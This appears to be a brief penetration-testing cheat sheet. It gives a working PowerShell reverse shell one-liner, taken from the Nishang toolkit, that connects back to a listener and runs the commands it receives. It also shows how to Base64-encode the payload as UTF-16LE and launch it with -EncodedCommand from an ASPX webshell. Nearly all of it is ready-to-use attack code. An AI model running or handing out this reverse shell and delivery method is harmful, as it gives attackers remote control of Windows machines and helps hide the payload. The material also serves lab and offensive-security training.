Powershell Reverse Shell One-Liner Command
From: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.119.120',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
- Encode the Powershell Executable using Base64 to avoid quotation and encoding issues
- In Kali:
iconv -f ASCII -t UTF-16LE powershellcmd.txt | base64 | tr -d "\n"- https://linux.die.net/man/1/iconv
- Powershell uses the UTF-16 Little Endian encoding version
+ Execute in ASPX webshell
powershell.exe -EncodedCommand [payload]